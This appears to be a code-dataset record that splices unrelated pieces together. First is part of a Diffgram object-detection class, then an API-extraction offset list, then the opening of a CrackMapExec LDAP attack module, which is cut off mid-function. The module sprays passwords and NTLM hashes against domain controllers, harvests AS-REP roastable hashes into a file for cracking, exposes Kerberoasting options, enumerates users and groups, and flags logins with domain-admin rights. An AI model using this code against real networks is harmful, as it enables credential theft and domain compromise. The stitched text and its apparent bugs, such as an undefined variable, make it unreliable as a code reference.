#self.image_np = self.resize(self.image_np)
# moved this here, was part of other thing prior
self.image_to_run = self.image_to_run.read()
self.run()
inference = self.inference_from_local()
return inference
if self.local is False:
files = {'file': open(path, 'rb')}
options = { 'immediate_mode' : 'True',
'ai_name' : self.name}
endpoint = "/api/walrus/v1/project/" + self.client.project_string_id \
+ "/inference/from_local"
response = self.client.session.post(
self.client.host + endpoint,
files = files,
data = options)
self.client.handle_errors(response)
data = response.json()
inference = self.inference_from_response(data['inference'])
return inference
# TODO handle creation of Inference and Instance objects
def run(
self,
image = None):
if self.build_complete is False:
return False
if image:
self.image_to_run = image
with self.graph.as_default():
# MUST HAVE compat.as_bytes for tf slim
# https://www.tensorflow.org/api_docs/python/tf/compat/as_bytes
# https://stackoverflow.com/questions/46687348/decoding-tfrecord-with-tfslim
self.image_to_run_expanded = tf.compat.as_bytes(self.image_to_run)
self.image_to_run_expanded = np.expand_dims(self.image_to_run_expanded, axis=0)
self.method = "object_detection"
if self.sub_method == "default" or self.sub_method is None:
self.run_object_detection()
inference = self.inference_from_local()
return inference
def run_object_detection(self):
(boxes, scores, classes, num) = self.sess.run(
[self.detection_boxes,
self.detection_scores,
self.detection_classes,
self.num_detections],
feed_dict = {
self.image_tensor: self.image_to_run_expanded } )
self.boxes = np.squeeze(boxes)
self.scores = np.squeeze(scores)
self.classes = np.squeeze(classes).astype(np.int32)
#print(self.boxes, self.scores, self.classes)
def nearest_iou(self, alpha, bravo):
_best_iou_hyper = .2
for i in range(len(alpha.box_list)):
best_iou = 0
best_index = None
# Find best IoU
for j in range(len(bravo.box_list)):
iou = Brain.calc_iou(alpha.box_list[i], bravo.box_list[j])
if iou >= best_iou:
best_iou = iou
best_index = j
if best_index is None:
continue
# handle large boxes, is the threat entirely inside the box?
alpha_box = alpha.box_list[i]
bravo_box = bravo.box_list[best_index]
            if best_iou > _best_iou_hyper or (best_iou > .01 and
                    alpha_box[1] < bravo_box[1] and
                    alpha_box[3] > bravo_box[3] and
                    alpha_box[0] < bravo_box[0] and
                    alpha_box[2] > bravo_box[2]):
# Assumes boxes have been thresholded already,
# This way threshold applies to nearest search too
class_id = bravo.label_list[best_index]
nearest_alpha_box = bravo.box_list[best_index]
# for stats
#self.average_iou = ( (best_iou + self.average_iou ) / 2)
# Where best_index is which bravo one
# is "in" which i index
print("alpha is in bravo", i, "in", best_index)
@staticmethod
def calc_iou(box_a, box_b):
# Calculate intersection, i.e. area of overlap between the 2 boxes (could be 0)
# http://math.stackexchange.com/a/99576
x_overlap = max(0, min(box_a[2], box_b[2]) - max(box_a[0], box_b[0]))
y_overlap = max(0, min(box_a[3], box_b[3]) - max(box_a[1], box_b[1]))
intersection = x_overlap * y_overlap
# Calculate union
area_box_a = (box_a[2] - box_a[0]) * (box_a[3] - box_a[1])
area_box_b = (box_b[2] - box_b[0]) * (box_b[3] - box_b[1])
union = area_box_a + area_box_b - intersection
if union == 0:
return 0
iou = intersection / union
return iou
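    # Worked example for calc_iou with boxes given as (min_1, min_2, max_1, max_2)
    # (the same arithmetic holds for the [ymin, xmin, ymax, xmax] ordering used
    # by the detector above): box_a = [0, 0, 2, 2], box_b = [1, 1, 3, 3]
    # -> intersection = 1 * 1 = 1, union = 4 + 4 - 1 = 7, iou = 1/7 ≈ 0.143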
def resize(self, image):
if image.shape[0] > 600 or image.shape[1] > 600:
ratio = min((300 / image.shape[0]),
(300 / image.shape[1]))
shape_x = int(round(image.shape[0] * ratio))
shape_y = int(round(image.shape[1] * ratio))
image = scipy.misc.imresize(image,
(shape_x, shape_y))
#print(image.shape)
return image
def predict_from_file(
self,
file_id):
"""
file_id, int, diffgram file id
Assumes singular file for now
"""
if self.local is True:
raise Exception("Not supported for local models yet.")
request = {}
request['file_list'] = [{'id' : file_id}]
request['ai_name'] = self.name
request['wait_for_inference'] = True
endpoint = "/api/walrus/project/" + self.client.project_string_id + \
"/inference/add"
response = self.client.session.post(
self.client.host + endpoint,
json = request)
self.client.handle_errors(response)
data = response.json()
inference = self.inference_from_response(data['inference'])
return inference
def local_setup(self):
"""
        Initial setup for local prediction
"""
self.get_checkpoint_and_label_map()
self.build()
def get_checkpoint_and_label_map(self):
"""
Get download links
Download checkpoint file for AI name
"""
request = {}
request['ai_name'] = self.name
endpoint = "/api/walrus/project/" + self.client.project_string_id + \
"/brain/local_info"
response = self.client.session.post(
self.client.host + endpoint,
json = request)
self.client.handle_errors(response)
data = response.json()
ai = data['ai']
self.id = ai['id']
# TODO continue to try and clarify label map crazinesss
self.file_id_to_model_id = ai['label_dict']
#print("Label map", self.file_id_to_model_id)
self.model_id_to_file_id = {v: k for k, v in self.file_id_to_model_id.items()}
self.file_id_to_name = {v: k for k, v in self.client.name_to_file_id.items()}
self.build_model_id_to_name()
# Data has url for models and label map
# TODO clarify difference between local path and url to download model
if self.use_temp_storage is True:
self.model_path = self.temp + "/" + str(self.id) + ".pb"
if self.use_temp_storage is False:
self.model_path = self.local_model_storage_path
self.url_model = ai['url_model']
self.download_file(
url = self.url_model,
path = self.model_path)
def build_model_id_to_name(self):
"""Creates dictionary of COCO compatible categories keyed by category id.
Args:
categories: a list of dicts, each of which has the following keys:
'id': (required) an integer id uniquely identifying this category.
'name': (required) string representing category name
e.g., 'cat', 'dog', 'pizza'.
Returns:
category_index: a dict containing the same entries as categories, but keyed
by the 'id' field of each category.
"""
self.model_id_to_name = {}
for file_id, label_name in self.file_id_to_name.items():
model_id = self.file_id_to_model_id.get(str(file_id), None)
if model_id:
self.model_id_to_name[model_id] = {'name' : label_name}
#print(self.model_id_to_name)
def download_file(
self,
url,
path
):
retry = 0
while retry < 3:
if url[0 : 4] != "http":
return False
response = requests.get(url, stream=True)
            if response.status_code != 200:
                retry += 1
                continue
content_type = response.headers.get('content-type', None)
with open(path, 'wb') as file:
file.write(response.content)
return True
return False
def check_status(
self):
"""
"""
request = {}
request['ai_name'] = self.name
endpoint = "/api/walrus/v1/project/" + self.client.project_string_id + \
"/brain/status"
response = self.client.session.post(
self.client.host + endpoint,
json = request)
self.client.handle_errors(response)
data = response.json()
self.status = data['ai']['status']
def clean(self):
try:
shutil.rmtree(self.temp) # delete directory
except OSError as exc:
if exc.errno != errno.ENOENT: # ENOENT - no such file or directory
raise # re-raise exception
def build(self):
"""
Build graph for local prediction
Assumes it has the checkpoint ready to go
"""
self.graph = tf.Graph()
with self.graph.as_default():
#with tf.device('/cpu:0'): # for local cpu testing
graph_def = tf.GraphDef()
with tf.gfile.GFile(self.model_path, 'rb') as fid:
serialized_graph = fid.read()
graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(graph_def, name='')
self.sess = tf.Session(graph=self.graph)
# TODO make this more flexible to work with different tensor types
self.image_tensor = self.graph.get_tensor_by_name('encoded_image_string_tensor:0')
self.detection_boxes = self.graph.get_tensor_by_name('detection_boxes:0')
self.detection_scores = self.graph.get_tensor_by_name('detection_scores:0')
self.detection_classes = self.graph.get_tensor_by_name('detection_classes:0')
self.num_detections = self.graph.get_tensor_by_name('num_detections:0')
self.build_complete = True
return True
def inference_from_local(
self,):
box_list = []
score_list = []
label_list = []
for i in range(self.boxes.shape[0]):
            if self.scores[i] is None:
                continue
if self.scores[i] > self.min_score_thresh:
#print("Detection")
box_list.append(self.boxes[i].tolist())
label_list.append(self.classes[i].tolist())
score_list.append(self.scores[i].tolist())
inference = Inference(
method = self.method,
id = None,
status = None,
box_list = box_list,
score_list = score_list,
label_list = label_list
)
return inference
def visual(self,
image = None
):
if image is None:
image = self.image_backup
# WIP
#if self.sub_method == "default" or self.sub_method is None:
#print("ran visual")
vis_util.visualize_boxes_and_labels_on_image_array(
image,
self.boxes,
self.classes,
self.scores,
self.model_id_to_name,
use_normalized_coordinates=True,
line_thickness=3,
min_score_thresh=self.min_score_thresh)
return image
|
[
"diffgram.brain.inference.Inference",
"tensorflow.Session",
"numpy.expand_dims",
"tempfile.mkdtemp",
"diffgram.utils.visualization_utils.visualize_boxes_and_labels_on_image_array",
"tensorflow.gfile.GFile",
"tensorflow.Graph",
"requests.get",
"numpy.squeeze",
"tensorflow.import_graph_def",
"tensorflow.GraphDef",
"tensorflow.compat.as_bytes"
] |
[((1340, 1512), 'diffgram.brain.inference.Inference', 'Inference', ([], {'method': '"""object_detection"""', 'id': "dict['id']", 'status': "dict['status']", 'box_list': "dict['box_list']", 'score_list': "dict['score_list']", 'label_list': "dict['label_list']"}), "(method='object_detection', id=dict['id'], status=dict['status'],\n box_list=dict['box_list'], score_list=dict['score_list'], label_list=\n dict['label_list'])\n", (1349, 1512), False, 'from diffgram.brain.inference import Inference\n'), ((4540, 4557), 'numpy.squeeze', 'np.squeeze', (['boxes'], {}), '(boxes)\n', (4550, 4557), True, 'import numpy as np\n'), ((4574, 4592), 'numpy.squeeze', 'np.squeeze', (['scores'], {}), '(scores)\n', (4584, 4592), True, 'import numpy as np\n'), ((10700, 10710), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (10708, 10710), True, 'import tensorflow as tf\n'), ((11975, 12095), 'diffgram.brain.inference.Inference', 'Inference', ([], {'method': 'self.method', 'id': 'None', 'status': 'None', 'box_list': 'box_list', 'score_list': 'score_list', 'label_list': 'label_list'}), '(method=self.method, id=None, status=None, box_list=box_list,\n score_list=score_list, label_list=label_list)\n', (11984, 12095), False, 'from diffgram.brain.inference import Inference\n'), ((12340, 12560), 'diffgram.utils.visualization_utils.visualize_boxes_and_labels_on_image_array', 'vis_util.visualize_boxes_and_labels_on_image_array', (['image', 'self.boxes', 'self.classes', 'self.scores', 'self.model_id_to_name'], {'use_normalized_coordinates': '(True)', 'line_thickness': '(3)', 'min_score_thresh': 'self.min_score_thresh'}), '(image, self.boxes, self.\n classes, self.scores, self.model_id_to_name, use_normalized_coordinates\n =True, line_thickness=3, min_score_thresh=self.min_score_thresh)\n', (12390, 12560), True, 'import diffgram.utils.visualization_utils as vis_util\n'), ((1172, 1190), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {}), '()\n', (1188, 1190), False, 'import tempfile\n'), ((3934, 3971), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', (['self.image_to_run'], {}), '(self.image_to_run)\n', (3952, 3971), True, 'import tensorflow as tf\n'), ((4005, 4055), 'numpy.expand_dims', 'np.expand_dims', (['self.image_to_run_expanded'], {'axis': '(0)'}), '(self.image_to_run_expanded, axis=0)\n', (4019, 4055), True, 'import numpy as np\n'), ((9730, 9760), 'requests.get', 'requests.get', (['url'], {'stream': '(True)'}), '(url, stream=True)\n', (9742, 9760), False, 'import requests\n'), ((10813, 10826), 'tensorflow.GraphDef', 'tf.GraphDef', ([], {}), '()\n', (10824, 10826), True, 'import tensorflow as tf\n'), ((11025, 11053), 'tensorflow.Session', 'tf.Session', ([], {'graph': 'self.graph'}), '(graph=self.graph)\n', (11035, 11053), True, 'import tensorflow as tf\n'), ((4610, 4629), 'numpy.squeeze', 'np.squeeze', (['classes'], {}), '(classes)\n', (4620, 4629), True, 'import numpy as np\n'), ((10836, 10873), 'tensorflow.gfile.GFile', 'tf.gfile.GFile', (['self.model_path', '"""rb"""'], {}), "(self.model_path, 'rb')\n", (10850, 10873), True, 'import tensorflow as tf\n'), ((10969, 11008), 'tensorflow.import_graph_def', 'tf.import_graph_def', (['graph_def'], {'name': '""""""'}), "(graph_def, name='')\n", (10988, 11008), True, 'import tensorflow as tf\n')]
|
# from https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py
# https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf
import requests
import logging
import configparser
from binascii import b2a_hex, unhexlify, hexlify
from cme.connection import *
from cme.helpers.logger import highlight
from cme.logger import CMEAdapter
from cme.helpers.bloodhound import add_user_bh
from cme.protocols.ldap.kerberos import KerberosAttacks
from impacket.smbconnection import SMBConnection, SessionError
from impacket.smb import SMB_DIALECT
from impacket.dcerpc.v5.samr import UF_ACCOUNTDISABLE, UF_DONT_REQUIRE_PREAUTH, UF_TRUSTED_FOR_DELEGATION, UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION
from impacket.krb5.kerberosv5 import sendReceive, KerberosError, getKerberosTGT, getKerberosTGS
from impacket.krb5.types import KerberosTime, Principal
from impacket.ldap import ldap as ldap_impacket
from impacket.krb5 import constants
from impacket.ldap import ldapasn1 as ldapasn1_impacket
from io import StringIO
ldap_error_status = {
"533":"STATUS_ACCOUNT_DISABLED",
"701":"STATUS_ACCOUNT_EXPIRED",
"531":"STATUS_ACCOUNT_RESTRICTION",
"530":"STATUS_INVALID_LOGON_HOURS",
"532":"STATUS_PASSWORD_EXPIRED",
"773":"STATUS_PASSWORD_MUST_CHANGE",
"775":"USER_ACCOUNT_LOCKED",
"50":"LDAP_INSUFFICIENT_ACCESS"
}
class ldap(connection):
def __init__(self, args, db, host):
self.domain = None
self.server_os = None
self.os_arch = 0
self.hash = None
self.ldapConnection = None
self.lmhash = ''
self.nthash = ''
self.baseDN = ''
self.remote_ops = None
self.bootkey = None
self.output_filename = None
self.smbv1 = None
self.signing = False
self.smb_share_name = smb_share_name
self.admin_privs = False
connection.__init__(self, args, db, host)
@staticmethod
def proto_args(parser, std_parser, module_parser):
ldap_parser = parser.add_parser('ldap', help="own stuff using LDAP", parents=[std_parser, module_parser])
ldap_parser.add_argument("-H", '--hash', metavar="HASH", dest='hash', nargs='+', default=[], help='NTLM hash(es) or file(s) containing NTLM hashes')
ldap_parser.add_argument("--no-bruteforce", action='store_true', help='No spray when using file for username and password (user1 => <PASSWORD>, user2 => <PASSWORD>')
ldap_parser.add_argument("--continue-on-success", action='store_true', help="continues authentication attempts even after successes")
ldap_parser.add_argument("--port", type=int, choices={389, 636}, default=389, help="LDAP port (default: 389)")
dgroup = ldap_parser.add_mutually_exclusive_group()
dgroup.add_argument("-d", metavar="DOMAIN", dest='domain', type=str, default=None, help="domain to authenticate to")
dgroup.add_argument("--local-auth", action='store_true', help='authenticate locally to each target')
egroup = ldap_parser.add_argument_group("Retrevie hash on the remote DC", "Options to get hashes from Kerberos")
egroup.add_argument("--asreproast", help="Get AS_REP response ready to crack with hashcat")
egroup.add_argument("--kerberoasting", help='Get TGS ticket ready to crack with hashcat')
vgroup = ldap_parser.add_argument_group("Retrieve useful information on the domain", "Options to to play with Kerberos")
vgroup.add_argument("--trusted-for-delegation", action="store_true", help="Get the list of users and computers with flag TRUSTED_FOR_DELEGATION")
vgroup.add_argument("--password-not-required", action="store_true", help="Get the list of users with flag PASSWD_NOTREQD")
vgroup.add_argument("--admin-count", action="store_true", help="Get objets that had the value adminCount=1")
vgroup.add_argument("--users", action="store_true", help="Enumerate enabled domain users")
vgroup.add_argument("--groups", action="store_true", help="Enumerate domain groups")
return parser
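    # Illustrative invocation sketch (assumes the usual CrackMapExec entry
    # point; host, credentials and output file below are placeholder values):
    #
    #   cme ldap 10.0.0.5 -u alice -p 'Spring2021!' -d CORP.LOCAL --kerberoasting kerb.txt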
def proto_logger(self):
self.logger = CMEAdapter(extra={
'protocol': "SMB",
'host': self.host,
'port': "445",
'hostname': self.hostname
})
def get_os_arch(self):
try:
stringBinding = r'ncacn_ip_tcp:{}[135]'.format(self.host)
transport = DCERPCTransportFactory(stringBinding)
transport.set_connect_timeout(5)
dce = transport.get_dce_rpc()
if self.args.kerberos:
dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
dce.connect()
try:
dce.bind(MSRPC_UUID_PORTMAP, transfer_syntax=('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0'))
            except DCERPCException as e:
if str(e).find('syntaxes_not_supported') >= 0:
dce.disconnect()
return 32
else:
dce.disconnect()
return 64
except Exception as e:
logging.debug('Error retrieving os arch of {}: {}'.format(self.host, str(e)))
return 0
def enum_host_info(self):
self.local_ip = self.conn.getSMBServer().get_socket().getsockname()[0]
try:
self.conn.login('' , '')
except:
#if "STATUS_ACCESS_DENIED" in e:
pass
self.domain = self.conn.getServerDNSDomainName()
self.hostname = self.conn.getServerName()
self.server_os = self.conn.getServerOS()
self.signing = self.conn.isSigningRequired() if self.smbv1 else self.conn._SMBConnection._Connection['RequireSigning']
self.os_arch = self.get_os_arch()
self.output_filename = os.path.expanduser('~/.cme/logs/{}_{}_{}'.format(self.hostname, self.host, datetime.now().strftime("%Y-%m-%d_%H%M%S")))
if not self.domain:
self.domain = self.hostname
try:
'''plaintext_login
DC's seem to want us to logoff first, windows workstations sometimes reset the connection
(go home Windows, you're drunk)
'''
self.conn.logoff()
except:
pass
if self.args.domain:
self.domain = self.args.domain
if self.args.local_auth:
self.domain = self.hostname
#Re-connect since we logged off
self.create_conn_obj()
def print_host_info(self):
self.logger.info(u"{}{} (name:{}) (domain:{}) (signing:{}) (SMBv1:{})".format(self.server_os,
' x{}'.format(self.os_arch) if self.os_arch else '',
self.hostname,
self.domain,
self.signing,
self.smbv1))
return True
def kerberos_login(self, domain, aesKey, kdcHost):
if self.kdcHost is not None:
target = self.kdcHost
else:
target = self.domain
self.kdcHost = self.domain
# Create the baseDN
self.baseDN = ''
domainParts = self.domain.split('.')
for i in domainParts:
self.baseDN += 'dc=%s,' % i
# Remove last ','
self.baseDN = self.baseDN[:-1]
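        # e.g. domain "corp.example.com" -> baseDN "dc=corp,dc=example,dc=com"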
try:
self.ldapConnection = ldap_impacket.LDAPConnection('ldap://%s' % target, self.baseDN, self.kdcHost)
self.ldapConnection.kerberosLogin(self.username, self.password, self.domain, self.lmhash, self.nthash,
self.aesKey, kdcHost=self.kdcHost)
except ldap_impacket.LDAPSessionError as e:
if str(e).find('strongerAuthRequired') >= 0:
# We need to try SSL
self.ldapConnection = ldap_impacket.LDAPConnection('ldaps://%s' % target, self.baseDN, self.kdcHost)
self.ldapConnection.kerberosLogin(self.username, self.password, self.domain, self.lmhash, self.nthash,
self.aesKey, kdcHost=self.kdcHost)
else:
errorCode = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
self.username,
self.password,
ldap_error_status[errorCode] if errorCode in ldap_error_status else ''),
color='magenta' if errorCode in ldap_error_status else 'red')
return True
def plaintext_login(self, domain, username, password):
self.username = username
self.password = password
self.domain = domain
if self.kdcHost is not None:
target = self.kdcHost
else:
target = domain
self.kdcHost = domain
# Create the baseDN
self.baseDN = ''
domainParts = self.kdcHost.split('.')
for i in domainParts:
self.baseDN += 'dc=%s,' % i
# Remove last ','
self.baseDN = self.baseDN[:-1]
if self.password == '' and self.args.asreproast:
hash_TGT = KerberosAttacks(self).getTGT_asroast(self.username)
if hash_TGT:
self.logger.highlight(u'{}'.format(hash_TGT))
with open(self.args.asreproast, 'a+') as hash_asreproast:
hash_asreproast.write(hash_TGT + '\n')
return False
try:
self.ldapConnection = ldap_impacket.LDAPConnection('ldap://%s' % target, self.baseDN, self.kdcHost)
self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
self.check_if_admin()
# Connect to LDAP
out = u'{}{}:{} {}'.format('{}\\'.format(domain),
username,
password,
highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else ''))
self.logger.extra['protocol'] = "LDAP"
self.logger.extra['port'] = "389"
self.logger.success(out)
add_user_bh(self.username, self.domain, self.logger, self.config)
if not self.args.continue_on_success:
return True
except ldap_impacket.LDAPSessionError as e:
if str(e).find('strongerAuthRequired') >= 0:
# We need to try SSL
try:
                    self.ldapConnection = ldap_impacket.LDAPConnection('ldaps://%s' % target, self.baseDN, self.kdcHost)
                    self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
                    self.check_if_admin()
                    out = u'{}{}:{} {}'.format('{}\\'.format(domain),
                                            username,
                                            password,
                                            highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else ''))
                    self.logger.extra['protocol'] = "LDAPS"
                    self.logger.extra['port'] = "636"
                    self.logger.success(out)
except ldap_impacket.LDAPSessionError as e:
errorCode = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
self.username,
self.password,
ldap_error_status[errorCode] if errorCode in ldap_error_status else ''),
color='magenta' if errorCode in ldap_error_status else 'red')
else:
errorCode = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
self.username,
self.password,
ldap_error_status[errorCode] if errorCode in ldap_error_status else ''),
color='magenta' if errorCode in ldap_error_status else 'red')
return False
except OSError as e:
self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
self.username,
self.password,
"Error connecting to the domain, please add option --kdcHost with the FQDN of the domain controller"))
return False
def hash_login(self, domain, username, ntlm_hash):
lmhash = ''
nthash = ''
#This checks to see if we didn't provide the LM Hash
if ntlm_hash.find(':') != -1:
lmhash, nthash = ntlm_hash.split(':')
else:
nthash = ntlm_hash
self.hash = ntlm_hash
if lmhash: self.lmhash = lmhash
if nthash: self.nthash = nthash
self.username = username
self.domain = domain
if self.kdcHost is not None:
target = self.kdcHost
else:
target = domain
self.kdcHost = domain
# Create the baseDN
self.baseDN = ''
domainParts = self.kdcHost.split('.')
for i in domainParts:
self.baseDN += 'dc=%s,' % i
# Remove last ','
self.baseDN = self.baseDN[:-1]
if self.hash == '' and self.args.asreproast:
hash_TGT = KerberosAttacks(self).getTGT_asroast(self.username)
if hash_TGT:
self.logger.highlight(u'{}'.format(hash_TGT))
with open(self.args.asreproast, 'a+') as hash_asreproast:
hash_asreproast.write(hash_TGT + '\n')
return False
# Connect to LDAP
try:
self.ldapConnection = ldap_impacket.LDAPConnection('ldap://%s' % target, self.baseDN, self.kdcHost)
self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
self.check_if_admin()
out = u'{}{}:{} {}'.format('{}\\'.format(domain),
username,
nthash,
highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else ''))
self.logger.extra['protocol'] = "LDAP"
self.logger.extra['port'] = "389"
self.logger.success(out)
add_user_bh(self.username, self.domain, self.logger, self.config)
if not self.args.continue_on_success:
return True
except ldap_impacket.LDAPSessionError as e:
if str(e).find('strongerAuthRequired') >= 0:
try:
# We need to try SSL
                    self.ldapConnection = ldap_impacket.LDAPConnection('ldaps://%s' % target, self.baseDN, self.kdcHost)
                    self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
                    self.check_if_admin()
                    out = u'{}{}:{} {}'.format('{}\\'.format(domain),
                                    username,
                                    nthash,
                                    highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else ''))
                    self.logger.extra['protocol'] = "LDAPS"
                    self.logger.extra['port'] = "636"
                    self.logger.success(out)
except ldap_impacket.LDAPSessionError as e:
errorCode = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
self.username,
self.password,
ldap_error_status[errorCode] if errorCode in ldap_error_status else ''),
color='magenta' if errorCode in ldap_error_status else 'red')
else:
errorCode = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
self.username,
self.password,
ldap_error_status[errorCode] if errorCode in ldap_error_status else ''),
color='magenta' if errorCode in ldap_error_status else 'red')
return False
except OSError as e:
self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
self.username,
self.nthash,
"Error connecting to the domain, please add option --kdcHost with the FQDN of the domain controller"))
return False
def create_smbv1_conn(self):
try:
self.conn = SMBConnection(self.host, self.host, None, 445, preferredDialect=SMB_DIALECT)
self.smbv1 = True
except socket.error as e:
if str(e).find('Connection reset by peer') != -1:
logging.debug('SMBv1 might be disabled on {}'.format(self.host))
return False
except Exception as e:
logging.debug('Error creating SMBv1 connection to {}: {}'.format(self.host, e))
return False
return True
def create_smbv3_conn(self):
try:
self.conn = SMBConnection(self.host, self.host, None, 445)
self.smbv1 = False
except socket.error:
return False
except Exception as e:
logging.debug('Error creating SMBv3 connection to {}: {}'.format(self.host, e))
return False
return True
def create_conn_obj(self):
if self.create_smbv1_conn():
return True
elif self.create_smbv3_conn():
return True
return False
def sid_to_str(self, sid):
try:
# revision
revision = int(sid[0])
# count of sub authorities
sub_authorities = int(sid[1])
# big endian
identifier_authority = int.from_bytes(sid[2:8], byteorder='big')
# If true then it is represented in hex
if identifier_authority >= 2 ** 32:
identifier_authority = hex(identifier_authority)
# loop over the count of small endians
sub_authority = '-' + '-'.join([str(int.from_bytes(sid[8 + (i * 4): 12 + (i * 4)], byteorder='little')) for i in range(sub_authorities)])
objectSid = 'S-' + str(revision) + '-' + str(identifier_authority) + sub_authority
return objectSid
except Exception:
pass
return sid
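    # Example: the objectSid bytes of the built-in Administrators group decode
    # as revision=1, two sub-authorities, identifier authority 5, and
    # little-endian sub-authorities 32 and 544, i.e. 'S-1-5-32-544'.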
def check_if_admin(self):
        # 1. get the SID of the domain
sid_domaine = ""
searchFilter = "(userAccountControl:1.2.840.113556.1.4.803:=8192)"
attributes= ["objectSid"]
resp = self.search(searchFilter, attributes, sizeLimit=0)
answers = []
for attribute in resp[0][1]:
if str(attribute['type']) == 'objectSid':
sid = self.sid_to_str(attribute['vals'][0])
sid_domaine = '-'.join(sid.split('-')[:-1])
        # 2. get the distinguishedName of the privileged groups
searchFilter = "(|(objectSid="+sid_domaine+"-512)(objectSid="+sid_domaine+"-544)(objectSid="+sid_domaine+"-519)(objectSid=S-1-5-32-549)(objectSid=S-1-5-32-551))"
attributes= ["distinguishedName"]
resp = self.search(searchFilter, attributes, sizeLimit=0)
answers = []
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
for attribute in item['attributes']:
if str(attribute['type']) == 'distinguishedName':
answers.append(str("(memberOf:1.2.840.113556.1.4.1941:=" + attribute['vals'][0] + ")"))
        # 3. get members of these groups
searchFilter = "(&(objectCategory=user)(sAMAccountName=" + self.username + ")(|" + ''.join(answers) + "))"
attributes= [""]
resp = self.search(searchFilter, attributes, sizeLimit=0)
answers = []
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
if item:
self.admin_privs = True
def getUnixTime(self, t):
t -= 116444736000000000
t /= 10000000
return t
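    # Illustrative note (not from the original source): getUnixTime converts a
    # Windows FILETIME (100 ns ticks since 1601-01-01) to a Unix timestamp, e.g.
    #   getUnixTime(132537600000000000) == 1609286400  # 2020-12-30 00:00:00 UTC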
def search(self, searchFilter, attributes, sizeLimit=0):
try:
logging.debug('Search Filter=%s' % searchFilter)
resp = self.ldapConnection.search(searchFilter=searchFilter,
attributes=attributes,
sizeLimit=sizeLimit)
except ldap_impacket.LDAPSearchError as e:
if e.getErrorString().find('sizeLimitExceeded') >= 0:
self.logger.error('sizeLimitExceeded exception caught, giving up and processing the data received')
# We reached the sizeLimit, process the answers we have already and that's it. Until we implement
# paged queries
resp = e.getAnswers()
pass
else:
self.logger.error(e)
return False
return resp
def users(self):
# Building the search filter
searchFilter = "(sAMAccountType=805306368)"
attributes= ['sAMAccountName', 'description', 'badPasswordTime', 'badPwdCount', 'pwdLastSet']
resp = self.search(searchFilter, attributes, sizeLimit=0)
if resp:
answers = []
self.logger.info('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
sAMAccountName = ''
badPasswordTime = ''
badPwdCount = 0
description = ''
pwdLastSet = ''
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
elif str(attribute['type']) == 'description':
description = str(attribute['vals'][0])
self.logger.highlight('{:<30} {}'.format(sAMAccountName, description))
except Exception as e:
self.logger.debug('Skipping item, cannot process due to error %s' % str(e))
pass
return
def groups(self):
# Building the search filter
searchFilter = "(objectCategory=group)"
attributes=['name']
resp = self.search(searchFilter, attributes, 0)
if resp:
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
name = ''
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'name':
name = str(attribute['vals'][0])
self.logger.highlight('{}'.format(name))
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.debug('Skipping item, cannot process due to error %s' % str(e))
pass
return
def asreproast(self):
if self.password == '' and self.nthash == '' and self.kerberos == False:
return False
# Building the search filter
searchFilter = "(&(UserAccountControl:1.2.840.113556.1.4.803:=%d)" \
"(!(UserAccountControl:1.2.840.113556.1.4.803:=%d))(!(objectCategory=computer)))" % \
(UF_DONT_REQUIRE_PREAUTH, UF_ACCOUNTDISABLE)
attributes = ['sAMAccountName', 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon']
resp = self.search(searchFilter, attributes, 0)
if resp:
answers = []
self.logger.info('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ''
memberOf = ''
pwdLastSet = ''
userAccountControl = 0
lastLogon = 'N/A'
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'userAccountControl':
userAccountControl = "0x%x" % int(attribute['vals'][0])
elif str(attribute['type']) == 'memberOf':
memberOf = str(attribute['vals'][0])
elif str(attribute['type']) == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
if mustCommit is True:
answers.append([sAMAccountName,memberOf, pwdLastSet, lastLogon, userAccountControl])
except Exception as e:
logging.debug("Exception:", exc_info=True)
